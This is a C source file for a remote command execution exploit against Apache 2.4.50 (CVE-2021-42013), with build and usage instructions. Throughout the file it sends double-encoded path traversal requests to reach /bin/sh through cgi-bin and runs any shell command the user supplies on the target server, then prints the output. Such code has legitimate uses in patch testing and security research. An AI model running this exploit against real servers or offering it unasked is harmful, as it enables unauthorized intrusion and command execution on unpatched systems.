#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <curl/curl.h>

/* Apache 2.4.50 exploit (CVE-2021-42013)
 * Author: Vilius Povilaika
 * Website: www.povilaika.com */

// compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013

int usage(char* prog)
{
  printf("Usage: %s <host> <exec>\n", prog);
  printf(" - %s https://127.0.0.1 \"uname -a\"\n", prog);
  return 0;
}

bool error(const char* reason)
{
  printf("[ERR] Critical error - %s\n", reason);
  return false;
}

struct callback_result {
  char* data;
  size_t size;
};

static size_t callback(void* pointer, size_t size, size_t nmemb, void* data)
{
  struct callback_result *memory = (struct callback_result *)data;
  char* ptr = realloc(memory->data, memory->size+nmemb+1);
  memory->data = ptr;
  memcpy(&(memory->data[memory->size]), pointer, nmemb);
  memory->size += nmemb;
  memory->data[memory->size] = 0;
  return nmemb;
}

bool exploit(void* result, char* host, char* exec)
{
  CURL *curl = curl_easy_init();
  char url[256];
  sprintf(url, "%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh", host);
  curl_easy_setopt(curl, CURLOPT_URL, url);
  char payload[256];
  sprintf(payload, "echo Content-Type: text/plain; echo; %s", exec);
  curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);
  curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback);
  curl_easy_setopt(curl, CURLOPT_WRITEDATA, result);
  int res = curl_easy_perform(curl);
  if (res != CURLE_OK)
    return error(curl_easy_strerror(res));
  curl_easy_cleanup(curl);
  return true;
}

int main(int argc, char* argv[])
{
  if (argc != 3)
    return usage(argv[0]);
  struct callback_result result = {0};
  bool res = exploit(&result, argv[1], argv[2]);
  if (res)
    printf("[+] Exploit finished successfully, check output\n");
  else
    printf("[-] Exploit failed, check output\n");
  printf(" \n%s\n", result.data);
  return 0;
}